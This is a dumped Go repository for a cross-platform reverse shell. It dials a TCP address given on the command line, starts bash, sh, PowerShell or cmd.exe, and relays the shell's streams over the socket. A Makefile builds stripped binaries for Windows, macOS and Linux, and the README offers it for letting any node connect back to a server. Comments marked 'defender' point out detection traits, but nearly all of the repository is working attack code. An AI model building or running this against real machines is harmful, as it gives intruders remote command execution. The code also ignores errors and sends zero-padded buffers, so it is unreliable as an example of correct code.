├── .gitignore ├── Makefile ├── README.md ├── go.mod ├── main.go ├── reverseShell.go ├── reverseShell_darwin.go ├── reverseShell_linux.go └── reverseShell_windows.go /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.exe 3 | *.exe~ 4 | *.dll 5 | *.so 6 | *.dylib 7 | 8 | # Test binary, built with `go test -c` 9 | *.test 10 | 11 | # Output of the go coverage tool, specifically when used with LiteIDE 12 | *.out 13 | 14 | # Dependency directories (remove the comment below to include it) 15 | # vendor/ 16 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | EXE = reverseShell 2 | SRC = . 3 | LDFLAGS = -ldflags="-s -w" 4 | 5 | windows: 6 | GOOS=windows go build -o $(EXE)_win.exe $(LDFLAGS) $(SRC) 7 | 8 | macos: 9 | GOOS=darwin go build -o $(EXE)_macos $(LDFLAGS) $(SRC) 10 | 11 | linux: 12 | GOOS=linux go build -o $(EXE)_linux $(LDFLAGS) $(SRC) 13 | 14 | all: windows macos linux 15 | echo "done." 16 | 17 | clean: 18 | rm -f $(EXE)_win.exe $(EXE)_macos $(EXE)_linux 19 | 20 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # reverseShell 2 | reverse Shell 3 | 4 | # What is he in the future? 
5 | 6 | Allow any node to revse shell to one port of a server at the same time 7 | 8 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/hktalent/reverseShell 2 | 3 | go 1.18 4 | -------------------------------------------------------------------------------- /main.go: --------------------------------------------------------------------------------
// Command reverseShell dials out over plain TCP to the address given as the
// first command-line argument, starts the local system shell, and relays bytes
// between the socket and the shell's standard streams.
//
// NOTE(defender): what this program exposes to monitoring is a process that
// holds an outbound TCP connection while parenting bash/sh/powershell/cmd with
// all three standard streams attached to pipes. Nothing in this file encrypts
// or authenticates the connection, so the session crosses the network as
// plaintext.
package main

import (
	"io"
	"log"
	"net"
	"os"
)

// main wires the socket to the shell through two unbuffered channels:
// socket -> recv -> shell stdin, and shell stdout/stderr -> send -> socket.
func main() {
	send := make(chan []byte)
	recv := make(chan []byte)
	// The remote address comes straight from os.Args[1]; there is no check
	// that an argument was supplied and no validation of its value.
	conn, err := net.Dial("tcp", os.Args[1])
	if nil == err {
		// main never returns normally (see the endless loop below), so this
		// deferred Close is not reached on the normal path.
		defer conn.Close()
		shellPath := GetSystemShell()
		go reverseShell(shellPath, send, recv)
		// Socket reader: every read uses a fresh readBufSize-byte buffer.
		go func() {
			for {
				data := make([]byte, readBufSize)
				read, err := conn.Read(data)
				if err != nil {
					// io.EOF is not logged; every error, EOF included, only
					// restarts the loop. There is no exit from this goroutine.
					if err != io.EOF {
						log.Printf("conn.Read is err: %v \n", err)
					}
					continue
				}
				if 0 < read {
					// The whole buffer is forwarded, not data[:read], so the
					// shell's stdin also receives the unused zero bytes.
					recv <- data
				}
			}
		}()
	} else {
		// Only logged: no shell and no reader goroutine are started on this
		// path, but control still falls through to the loop below.
		log.Printf("net.Dial is err: %v \n", err)
	}
	// Socket writer: a single-case select, i.e. a blocking receive on send.
	for {
		select {
		case outgoing := <-send:
			// Placeholder for wrapping the data in a custom protocol; as
			// written, the bytes go onto the wire unchanged and the result of
			// Write is ignored.
			conn.Write(outgoing)
		}
	}

}
-------------------------------------------------------------------------------- /reverseShell.go: --------------------------------------------------------------------------------
package main

import (
	"log"
	"os"
	"os/exec"
)

const (
	// readBufSize is the size in bytes of every buffer allocated for socket
	// and pipe reads. Whole buffers are forwarded, so it is also the fixed
	// size of every chunk that is relayed.
	readBufSize = 128
)

// exists reports whether path can be assumed to exist. It returns false only
// when os.Stat reports "not exist"; any other Stat error (for example a
// permission error) is treated as "exists".
func exists(path string) bool {
	_, err := os.Stat(path)
	if err == nil {
		return true
	}
	if os.IsNotExist(err) {
		return false
	}
	return true
}

// reverseShell starts command with no arguments and bridges its standard
// streams to the two channels: data received on recv is written to the child's
// stdin, and buffers read from the child's stdout and stderr are sent on send.
// It never returns.
//
// NOTE(defender): every chunk in either direction is also passed to
// log.Printf with %v, which prints a byte slice as a list of decimal values.
// The standard logger writes to stderr by default, so the process's own stderr
// carries a transcript of the session.
func reverseShell(command string, send chan<- []byte, recv <-chan []byte) {
	var cmd *exec.Cmd
	cmd = exec.Command(command)

	// Errors from creating the three pipes are discarded.
	stdin, _ := cmd.StdinPipe()
	stdout, _ := cmd.StdoutPipe()
	stderr, _ := cmd.StderrPipe()

	// recv -> child stdin. Single-case select, i.e. a blocking receive.
	go func() {
		for {
			select {
			case incoming := <-recv:
				log.Printf("[*] shell stdin write: %v", incoming)
				stdin.Write(incoming)
			}
		}
	}()

	// child stderr -> send. The byte count and error returned by Read are
	// ignored, so a full readBufSize buffer is sent on every iteration
	// regardless of how much was read.
	go func() {
		for {
			buf := make([]byte, readBufSize)
			stderr.Read(buf)
			log.Printf("[*] shell stderr read: %v", buf)
			send <- buf
		}
	}()

	// The error returned by Start is not checked.
	cmd.Start()
	// child stdout -> send, with the same ignored Read results as the stderr
	// loop above. The loop has no exit condition.
	for {
		buf := make([]byte, readBufSize)
		stdout.Read(buf)
		log.Printf("[*] shell stdout read: %v", buf)
		send <- buf
	}
}
-------------------------------------------------------------------------------- /reverseShell_darwin.go: --------------------------------------------------------------------------------
package main

// The _darwin file-name suffix restricts this file to macOS builds.
const (
	// Absolute paths of the shells that may be launched.
	bash = "/bin/bash"
	sh   = "/bin/sh"
)

// GetSystemShell returns the path of the shell to launch: bash when exists
// reports it present, otherwise sh.
func GetSystemShell() string {
	if exists(bash) {
		return bash
	}
	return sh
}
-------------------------------------------------------------------------------- /reverseShell_linux.go: --------------------------------------------------------------------------------
package main

// The _linux file-name suffix restricts this file to Linux builds.
const (
	// Absolute paths of the shells that may be launched.
	bash = "/bin/bash"
	sh   = "/bin/sh"
)

// GetSystemShell returns the path of the shell to launch: bash when exists
// reports it present, otherwise sh.
func GetSystemShell() string {
	if exists(bash) {
		return bash
	}
	return sh
}
-------------------------------------------------------------------------------- /reverseShell_windows.go: --------------------------------------------------------------------------------
package main

// The _windows file-name suffix restricts this file to Windows builds.
const (
	// Absolute paths of the shells that may be launched.
	commandPrompt = "C:\\Windows\\System32\\cmd.exe"
	powerShell    = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
)

// GetSystemShell returns the path of the shell to launch: PowerShell when
// exists reports it present, otherwise cmd.exe.
func GetSystemShell() string {
	if exists(powerShell) {
		return powerShell
	}
	return commandPrompt
}
--------------------------------------------------------------------------------